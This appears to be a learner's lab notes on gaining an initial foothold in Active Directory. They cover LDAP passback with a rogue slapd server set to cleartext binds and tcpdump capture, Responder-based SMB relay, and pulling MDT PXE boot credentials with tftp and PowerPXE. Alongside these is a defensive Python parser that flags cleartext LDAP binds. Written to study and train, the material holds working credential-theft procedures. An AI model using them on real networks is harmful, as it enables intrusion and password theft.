1. Getting a Foothold

Brute Forcing NetNTLM

Internet-facing applications may have their authentication tied back to AD. If we manage to brute-force these credentials, we may gain access to the server.

LDAP Passback attack

If we have access to a page holding LDAP configuration with the password censored out, we can set up our own LDAP server, point the configuration at it and intercept the authentication traffic to obtain the password.

$ sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd

$ sudo dpkg-reconfigure -p low slapd

Create an olcSaslSecProps.ldif file. The settings below make slapd offer only cleartext SASL mechanisms (no anonymous binds, minimum security strength 0, credentials passed through), so the connecting application falls back to sending the password in the clear.

#olcSaslSecProps.ldif
dn: cn=config
changetype: modify
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

Patch the running LDAP configuration with the created file and restart slapd

$ sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart

Run tcpdump on the LDAP port, then click Test Settings in the application so it sends the bind request to our server; the cleartext password shows up in the captured packets

$ sudo tcpdump -SX -i <interface> tcp port 389
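As an added example (not part of the original notes, and not code from any tool named above), the following Python parses LDAP BindRequests from unencrypted port-389 traffic and flags the binds that carry a password in the clear, which is exactly what the passback above harvests; run over a real capture or a monitoring feed it tells a defender which applications still fall back to simple or PLAIN binds. All messages and helper names (ber_read, parse_bind, bind_message, sasl_tlv, flag_cleartext_binds) are constructed for the example.

```python
# Added example, not from the original notes: flag LDAP binds on port 389 that
# carry a password in the clear. Sample messages and helper names are constructed.
def ber_read(buf, pos=0):
    """Read one BER TLV at pos; return (tag, value, next_pos). Handles long-form lengths."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: next n bytes hold the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def ber_write(tag, value):
    """Encode one short-form BER TLV (values under 128 bytes are enough for a bind)."""
    return bytes([tag, len(value)]) + value

def parse_bind(msg):
    """Return bind details if msg is an LDAP BindRequest (RFC 4511), else None."""
    tag, body, _ = ber_read(msg)
    if tag != 0x30:                         # LDAPMessage ::= SEQUENCE { messageID, protocolOp }
        return None
    _, msg_id, pos = ber_read(body)
    op_tag, op, _ = ber_read(body, pos)
    if op_tag != 0x60:                      # [APPLICATION 0] BindRequest
        return None
    _, _, pos = ber_read(op)                # version INTEGER (skipped), then name LDAPDN
    _, name, pos = ber_read(op, pos)
    auth_tag, auth, _ = ber_read(op, pos)   # authentication CHOICE
    info = {"message_id": int.from_bytes(msg_id, "big"), "name": name.decode()}
    if auth_tag == 0x80:                    # [0] simple: the value IS the password
        info.update(auth="simple", cleartext=True, secret=auth.decode("utf-8", "replace"))
    elif auth_tag == 0xA3:                  # [3] sasl: SEQUENCE { mechanism, credentials }
        _, mech, pos = ber_read(auth)
        info.update(auth="sasl", mechanism=mech.decode(), cleartext=mech in (b"PLAIN", b"LOGIN"))
    return info

def bind_message(msg_id, dn, auth_tlv):
    bind = ber_write(0x02, b"\x03") + ber_write(0x04, dn.encode()) + auth_tlv
    return ber_write(0x30, ber_write(0x02, bytes([msg_id])) + ber_write(0x60, bind))

def sasl_tlv(mechanism, creds):
    return ber_write(0xA3, ber_write(0x04, mechanism.encode()) + ber_write(0x04, creds))

def flag_cleartext_binds(messages):
    """One alert per bind whose password crosses the wire unprotected (no TLS on 389 assumed)."""
    return [f"msg {b['message_id']}: {b['auth']} bind by '{b['name']}' exposes the password"
            for b in map(parse_bind, messages) if b and b.get("cleartext")]

# Constructed traffic (LDAPMessage { id, BindRequest { v3, dn, auth } }): a simple bind,
# a SASL PLAIN bind and a SASL GSSAPI bind; only the first two expose a password.
SAMPLES = [bind_message(1, "cn=svcLDAP,dc=example,dc=com", ber_write(0x80, b"Passw0rd!")),
           bind_message(2, "", sasl_tlv("PLAIN", b"\0svcLDAP\0Passw0rd!")),
           bind_message(3, "", sasl_tlv("GSSAPI", b"<placeholder token, not a real ticket>"))]
```

If the application uses LDAPS or STARTTLS, the bind is inside TLS and this parser sees nothing, which is the expected state for a correctly configured client.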

SMB Auth Relay

Use Responder to intercept NTLM authentication traffic.

After we get the NTLM hash, we can either

  1. Crack the hash

  2. Relay the hash and MITM the process of getting a TGS. For this to happen, SMB signing needs to be disabled, or enabled but not enforced (enforcing SMB signing on all hosts is the mitigation).

Microsoft Deployment Toolkit (MDT)

Extracting credentials preloaded in the PXE boot image

Download the BCD file from the MDT server over TFTP

C:\Users\THM\Documents\Am0> tftp -i <THMMDT IP> GET "\Tmp\x64{39...28}.bcd" conf.bcd

Get the location of the WIM file from the BCD file with PowerPXE

C:\Users\THM\Documents\Am0> powershell -executionpolicy bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\THM\Documents\am0> Import-Module .\PowerPXE.ps1
PS C:\Users\THM\Documents\am0> $BCDFile = "conf.bcd"
PS C:\Users\THM\Documents\am0> Get-WimFile -bcdFile $BCDFile
>> Parse the BCD file: conf.bcd
>>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim
\Boot\x64\Images\LiteTouchPE_x64.wim

Download the WIM file over TFTP and extract the credentials stored in its Bootstrap.ini

PS C:\Users\THM\Documents\am0> tftp -i <THMMDT IP> GET "\Boot\x64\Images\LiteTouchPE_x64.wim" pxeboot.wim
Transfer successful: 341899611 bytes in 218 second(s), 1568346 bytes/s
PS C:\Users\THM\Documents\am0> Get-FindCredentials -WimFile pxeboot.wim
>> Open pxeboot.wim
>>>> Finding Bootstrap.ini
>>>> >>>> DeployRoot = \\THMMDT\MTDBuildLab$
>>>> >>>> UserID = <account>
>>>> >>>> UserDomain = ZA
>>>> >>>> UserPassword = <password>

Configuration files

If we already have access to the host machine, search it for artifacts that may contain credentials:

  • Configuration files

  • Data stores

  • Password stores
